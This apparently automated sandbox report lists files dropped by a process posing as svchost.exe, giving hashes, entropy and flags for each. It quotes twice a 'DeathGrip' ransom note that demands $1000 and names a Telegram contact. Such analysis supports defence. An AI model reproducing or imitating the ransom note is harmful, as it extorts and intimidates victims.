                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15360
                                                          Entropy (8bit):7.985727437398473
                                                          Encrypted:false
                                                          SSDEEP:384:zEiXeYKIy9kgUKE4PzO/pJAZENSzMd3BA5YVf/0Uq:YiX9EkrGPzO/opeHVf8D
                                                          MD5:8816D5F96E47D8CBF7E0BDE2DD105EA3
                                                          SHA1:507EE2086616580678FE997EF0E0D403EA5E2E6C
                                                          SHA-256:4E59CAC65F8465AE85F3FD4F25E90B1F2F9F65EAA02E74FAC0898FEB17E1CB92
                                                          SHA-512:534D669E206154B3067912C130A2046E3FB0CFD6F13F50317D86E7D14651C6E4395AF0A6B261094ECDDA442713AA9B8F8C09FD12396BC29A124DA850E8773D13
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13552
                                                          Entropy (8bit):7.98547957415924
                                                          Encrypted:false
                                                          SSDEEP:384:GImKebLE6gOikNMA647t07BvcHc5LcOkUhaCO86:GIbe438BEBvGwOKaCn6
                                                          MD5:55DFF03D9808BF6F75FE81D2E3F8F33E
                                                          SHA1:E0F25CF001FC47A9C4300929C3B0E6B03F1212F0
                                                          SHA-256:8A58621DB44B99861CF0A37E34A5CF5C31E6F89AA385DAB1CD248CD1519F954C
                                                          SHA-512:00CE545C4A7E400E8A50EC634F126ABA87A8C60BBEC99D9A9765ECE812CA07A2FDAEA0175A2120BD5DC0E16C2E9FF091BFB6530C0D623B9A71A7AA1C8BF017B6
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14944
                                                          Entropy (8bit):7.985801698449098
                                                          Encrypted:false
                                                          SSDEEP:384:jvAT9eXmfK3FDfvN658Uu8lRI4sZdMC8/6gm:jc9ImfG5HU5ZRI4wdJ8Xm
                                                          MD5:36A8652CEAFA4921403609CFCA258D00
                                                          SHA1:F53DD7834BF226335198CBEE7EDAFCD2C9FA0747
                                                          SHA-256:DF1BFD7298BAA2C18A2B3AC952B2B2938019186F3783AB477B31D506B14B03A0
                                                          SHA-512:4B689884D996A9633CD06BEDAC470172B7B8B4FD9EE1A2ECB7EE9BB50BD92525404802D19012336833549113D769FDE54510A6FF76F50B71A0B82E84C8FC592D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15936
                                                          Entropy (8bit):7.988798951224312
                                                          Encrypted:false
                                                          SSDEEP:384:oog13ucYK44ZMfxNpkfZmefGR4bgVwE7A:SYKX2SBfW1A
                                                          MD5:81741548075D54E23219D6BD5813257E
                                                          SHA1:98D44C34FD30308BAA4563E8C659FACDBAABE758
                                                          SHA-256:9CD0594BEF3D5B09B48307B44768F7760C7A890DB53898785D3F3EE81E0E4344
                                                          SHA-512:EAB97A7491F7BE67D9F183A9F3C785F9D3AD14A9FC25D7224F759570745A9634AE89728F4DBA358287C279178B956FA405DD7E8E26E3833768F8A81496C90E63
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15920
                                                          Entropy (8bit):7.988250623309588
                                                          Encrypted:false
                                                          SSDEEP:384:Bpqpjt9G2UoWRrwFEcF42VlnCcvoCC7MbXA/OCeuLO:BpOjt9G2UhejF42TC1CC40/OELO
                                                          MD5:57A58AE6A6D7D67CF58352CA244247F4
                                                          SHA1:B17778B9C10F3C03D1C91B0579033499225F12E5
                                                          SHA-256:233DD4CF00D853993F3BCCD69DC7B6881FFE2396A429DCD61016028D6DC774E6
                                                          SHA-512:2007738DFFFD5574B11B4A95EA1B218A943AFB7428EE602456AD320956B5EC96CD9D962AC91CDC026A4DCDCBA92F57BF03677641C797DDF2BCC4CA6F3CC61EF4
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14512
                                                          Entropy (8bit):7.985961578069724
                                                          Encrypted:false
                                                          SSDEEP:384:3tX2Hz9K9mJafQbj5IVlNsuMNOUH7JobXRh9x8:30Hz9K4eyj5QcBwRh9x8
                                                          MD5:3777F59CFFE9276A556E5B234C38795A
                                                          SHA1:324F5841A25054466ABAC6A0C50FCD1D6142B839
                                                          SHA-256:31B111F61BED7D2809DA1696B85F6C64BDEE5651183056A33E92CF113071E7DB
                                                          SHA-512:0A32067A76EFBB84276BD64BE0D7FA055459E3F04636EF2CF35FCF65858C1A406D50C44F8D3AA37AD07FD32A1152323F6BD9AA88B9D5E5DD706A5A322DC8DD28
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14960
                                                          Entropy (8bit):7.986101629887228
                                                          Encrypted:false
                                                          SSDEEP:384:ngNd8cw0Erlfvgq7Nd+KO20tkWIHC/3laIrmFhZ5qu7SoW+8kK:2utlHLbAaWgC/3laIrmJ1S8E
                                                          MD5:9C7DD4E60E0C2DBBAD8EFC36AF13E741
                                                          SHA1:959B9AE93307927E787B785311B4E59B1A7B5EF7
                                                          SHA-256:3AFA38D90E510320AED00F006BD635B3611F0B507F59CA3127593799A07721EF
                                                          SHA-512:C0C962D211D00A50E6F03FD169E7E4D614278BE66A835758840801F7E91351D7DA5B7A9EC3A694223450F5BF04F4EEC445DAF68568B4C9434398F7120BB480A7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):17232
                                                          Entropy (8bit):7.988915886208556
                                                          Encrypted:false
                                                          SSDEEP:384:jitUuPLFuZhWq67/r6LHWPtsFjOMmdvjIweB3SMUZ3M:jitUuDFX9jq2P2F0jrIYBM
                                                          MD5:9DFA4A5B46578DD702A29B78632C8A65
                                                          SHA1:FBFDB11B94001FCCD212257AB7A17734D6530ECE
                                                          SHA-256:07E271D5673F437FAF45724D54B633C3C0F9C1DA278099E63E62D247DA45825D
                                                          SHA-512:0C604D28C8894E0C4A6D740D7535BA777AECCE53C1E904DCA819B45F3F65F82F9700D826E93E7FB454264BA858BAAB5905BB837C650293F601A64F2D72FB7AAE
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14816
                                                          Entropy (8bit):7.987240227013427
                                                          Encrypted:false
                                                          SSDEEP:384:qUmLitt+lAinQUa7xC5C8bHjGdbbovgjq9KilYa559Z1v:qHat0QUAg5tEoYjsYq1v
                                                          MD5:046047413505B5DE72C4A756F559CB99
                                                          SHA1:B0A89E06E93DB900C3B8E3AFD5BDE6505301196C
                                                          SHA-256:260B83CC483531E494A18510A6CE2DFEBAF551F346E07125912B023C3BDD1281
                                                          SHA-512:3A6F693255E54EAF23F1D2055CB196BBFF6F69829A0D8A566AC64C00182CE5CA2B0C1A7AB01A4F6D8221F8B196F993EF06A4EEE456294E209A384FF3B784BF21
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14800
                                                          Entropy (8bit):7.984126295386031
                                                          Encrypted:false
                                                          SSDEEP:384:d/CX+tehfrh1LS3xJk3XHNSEt/YLBCYLaD:d/m+ehfFmx23XHNp9XAaD
                                                          MD5:D4C11614EB2AD1E14241285598671475
                                                          SHA1:0524CB614B98962656715144492BCF10729E239C
                                                          SHA-256:95937483A1A328541698FEE31E3B97D78AD73B01BE4EA04A46020999363DADCA
                                                          SHA-512:1D673D1C716E7A5B259F5D92A9A4098C2C2573DBC2DC6C8919A1656E66AE4C6C6A250A07293193E6310E2CA2BD23D0B45B1E956351E00037841E2E1F814C25A9
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14976
                                                          Entropy (8bit):7.987513392403904
                                                          Encrypted:false
                                                          SSDEEP:384:dEVze4Gh70DY9exFRxMgq8GRJ1YfRfa1yns+uW8QCpyd:O7EI5xM98wjqRkp+uDpyd
                                                          MD5:AD51613AA45A176E2CE3BCE483B4D51A
                                                          SHA1:DCC5598AC83B22D07FB845E3C3184F49602B44F6
                                                          SHA-256:53086A9E511ADBAFECA196AAE7C339B56452AE371B26D2C6C97FF8C30B1AFA23
                                                          SHA-512:93F90BC6A4DFDB236301F66021371E6ECC2E890A109E5F67A9D49B27EF44B2FB4CC87F7E487857B384BC8584FE68F76AB3F8E45AAED5307AAB676AF3E455C3B1
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20848
                                                          Entropy (8bit):7.991188058534037
                                                          Encrypted:true
                                                          SSDEEP:384:eiVn33OiHAXi76bW8+FPtqZcnDnezsTQK15OPRw2wBUd1WCSBiSxAe8F:eiVn33x0lbQPRnDez7oOJOBU3W7WeO
                                                          MD5:0FCAE21EE0B4A292EFE399BA3D9C6703
                                                          SHA1:00FE912D814C664F0705E507D5CD49E459DFF2DB
                                                          SHA-256:B7B6FD5AE31D1417CBF4B8C63D77042CAA9ACFD856FBB03BF6AFF92B22E83B41
                                                          SHA-512:3B96E2C856F906E2F89C2192AE0C9225446A96388F95D2DD46B9BC950495330DF157133F905FD87A05111019F15C8C5775F2FDD3517D3380241793BFA0CB667A
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14544
                                                          Entropy (8bit):7.9867650234612775
                                                          Encrypted:false
                                                          SSDEEP:384:siOKjAWM6W4FhtmRrSzsVo7Mn9CNB5Zl0cbPxw:rOKEWbF7mRrNo7M4NPZlvJw
                                                          MD5:7F75FE71491466A6AC19C7D0CC6339A1
                                                          SHA1:D9DC1511FE127D5E7635399AEB12E85EBED255CC
                                                          SHA-256:2DB2FFECDE36778D907E95D764965D7A7B37C6E517A1CA65FC79974C1829BD63
                                                          SHA-512:2E36004B5E00CF2FAAD57B762765813859D250A37BB963FBE5DE9A5426A6F5824C5D1173BD7A66DF5CE8302B60E2B5089B9980FE808DB8A88ED232D9B6406E2A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13232
                                                          Entropy (8bit):7.9835457547725674
                                                          Encrypted:false
                                                          SSDEEP:384:briylgUReG4tfrbS/m8cCrILQ+AcnEM82g:6CgSUtfrbS/mzCreQRDM8h
                                                          MD5:5C2FAF20AF91017889A1DBF575A99FDD
                                                          SHA1:10EE8930B363E2A00220BC8461FC1413ECC271E8
                                                          SHA-256:4D4BF43F3C0F5C8C724620B3F96DEE6DDED4CCF937123BE98F5C79ECD78BCE66
                                                          SHA-512:9E2488C2625CFA687F46B8FB6FBF0D0F167418C0A886CEAEE26E61C3D814D763B2F72B4B446EA3663C86E994AEFDD28376838671EDC5FD237D600E42684F6508
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2333872
                                                          Entropy (8bit):7.999924122549679
                                                          Encrypted:true
                                                          SSDEEP:49152:WeNTsM/MpRxopgJGIFw4w5GZLX3gcc14NJGpRenfutWSqf4ak4XJg0T:WeNTCua/w4wen5cUspRenfEW+aZ9T
                                                          MD5:7AC294EC7479E0C069FF98869F958BC8
                                                          SHA1:DCAE35FC254F8AD56037821A86D635354D2ADDAA
                                                          SHA-256:617F791A2ABE50AAC8FFA4A5B7FF0378A2E912037417FE3497E5AAB22ADF6AB0
                                                          SHA-512:71CA8B0A665837BE86AE1BE99FBCBC4D5336186F227C3056597C240C8691A3FEE98E983F674F9B7D921AE91964DF56F6A55AD0EE32D99908BDCF66894E47307D
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1232
                                                          Entropy (8bit):7.6893922027966
                                                          Encrypted:false
                                                          SSDEEP:24:A5YKE9b5MAxK7MMkj0MtGMoORvB/Y0uhqtAosqHasam6aBucDkCMs:AuKE9bBxqqgOjYXqtAZq6sMkFgY
                                                          MD5:79CE03E268777853B48D7047CEB33443
                                                          SHA1:3FE942A7BF695AC842BBFDE3AFF2017C8CB4535A
                                                          SHA-256:77256FE1DE02EB97F81652A0BC9E49064722DE01243E57778722889A4046C7F0
                                                          SHA-512:7D87002328826186A430F76D18113EBFB4BF37911D9174329433A5C2A579A3DD029D88E0BFF17B90A6A6EEF625B692630939128B6EFF4A7EFAE09FFB5AFD33E7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):784
                                                          Entropy (8bit):7.444210531375938
                                                          Encrypted:false
                                                          SSDEEP:24:zqlOsvtfmayiqOZW3ojeIY4Q8RD8g+RjPl1NC:zqAsvtZfqOs37hERD8gaT4
                                                          MD5:BB5BB804F8C6C61FCF72D190FAFAFA70
                                                          SHA1:9B511402D9F23B06D91F11CD7E17F504F9B9E286
                                                          SHA-256:134EB802CF1029D0C3AF6D96AE38596BC32917AD0C94CDDF32DD7428AF59329C
                                                          SHA-512:A295B6620A589CE5B2BBD8703D818FB2AFF3FBED662D598F618B65F92EFED96195C737818D52D6550924E9AEBDF702DC5B6C5787153B5D83CB0164F25BA5A356
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.486842971884627
                                                          Encrypted:false
                                                          SSDEEP:24:ql1sNGNQEawy9Lij8wjzUjT+GUEtuX+nY52b/DcEvboZ6uFxuL:yykNQEawy9Lr5UEIRA7pvM3uL
                                                          MD5:2E1C420DA557FE0F7193B5FB68A7A413
                                                          SHA1:B4F504A3738D1EB8D36A6ED8E4782AF56D5F2E25
                                                          SHA-256:ECD3D664E1B0D71A9A52CD2E0740790EFC0FC836A7114166C98511468BD27C1F
                                                          SHA-512:D12ABD8979BBA0286FA76343078E852BD28AF8027743B19D7B9F8FCB11BD0876458608169099DD2C7CF182CC27FA43BDEA0FA18F8D7D8C99062C67D59C401641
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):944
                                                          Entropy (8bit):7.538588311610406
                                                          Encrypted:false
                                                          SSDEEP:24:ZT+xZvpnQkS2ZAws0AFyFhkef9o+0X0Rcd1G5g:4ZvhlS2ywFkyTkSKVvd1wg
                                                          MD5:A7C1B9B7EC571BDF9FA22EC17B81C917
                                                          SHA1:AACB4B4365724B60444701204362BEEA327FA6A7
                                                          SHA-256:4BED39275FC35E85CD58AB5844CCB14832DE26B6DC97F400ADD017F77537CFB9
                                                          SHA-512:6DF88A616A88E9FE85E2A9CDDD0621816A6CFE4C2DA1C6ED183CEB8E7959F175CE34FC1CC13BA3609E55C55EBE2979A52D671179A19676BD4A195584DFD0C218
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.388332138726002
                                                          Encrypted:false
                                                          SSDEEP:12:d0uzkPeIjR0Jy2HMbjzVwsPiFjeOufvppAWyLDKfRyZb78HunwssVY/ds/Vw:d0PBjR0Q2HqzVweiFjeO2pkDB4Ontsdw
                                                          MD5:AFBF1CCBA47B28A97A40F4280A80A999
                                                          SHA1:F182CC57025425F7CE17A90A3DC346A6297EC94C
                                                          SHA-256:0AB5D15A077D059BB26E0D1896EE13ED9FDF10E2F5761BC4311F59FEA7A2465C
                                                          SHA-512:D6F6F4E5A6345724929AB73CCC13FE978E5ADB6D729945535AE179355ADDC74494A16F46529DECF08B0EC9829B5795E384586385F1B482A200ED1E1C3F11F928
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.498517470159681
                                                          Encrypted:false
                                                          SSDEEP:12:zlonBIbGA52HrEfPKDKafiqR0MJIUzvgdBfgUECUzGiGPETu1bD8Ir8ajldFAY:zlonBIGdHXw+/DFeiGcWbD8Ir/5X
                                                          MD5:FAB14616C587F263791C60EE7E196CFA
                                                          SHA1:0601700F3DC151C5C17FC8693DAC2B3F5180698A
                                                          SHA-256:D485B32ECC8C99CD7A848A8179C2815C59611983B96DCC39CC8D4C8D0F4D55ED
                                                          SHA-512:9EA1AE16A610106A93D7DE847F177B6796DA20AD01D5D5DBB071841D6E66097C78F4BD94A9507C25A3C8A2C531FD8C65A6E84E1945DD06BFDD54380E3870A7C1
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.415515636036232
                                                          Encrypted:false
                                                          SSDEEP:12:WkNSnO7mb6y1DGtDrAImJV3eIE/Mc6co6FPjR+SEGDeczqxGHwOWzYs2lgoXFBR6:WkonOZ0+ANFEJ6cNhwSEFowtz3LoX3Jq
                                                          MD5:154AA1C4D9D99C5E8AB58997B553E292
                                                          SHA1:562039ADD4E72C8C6F72637B7B620428D48EA4FB
                                                          SHA-256:8A54845031F040F5F5673D98430EA2FA889002EE354FFC20C7E07321646F9944
                                                          SHA-512:9840509C2C38FD08BA915A8EFF26609E2AB45675C3F1BADD2D43AB82CCEFAE97B212CA362023ABF8509553D885C6A7A173E467B3A1496D03A87002CCDEF7B297
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
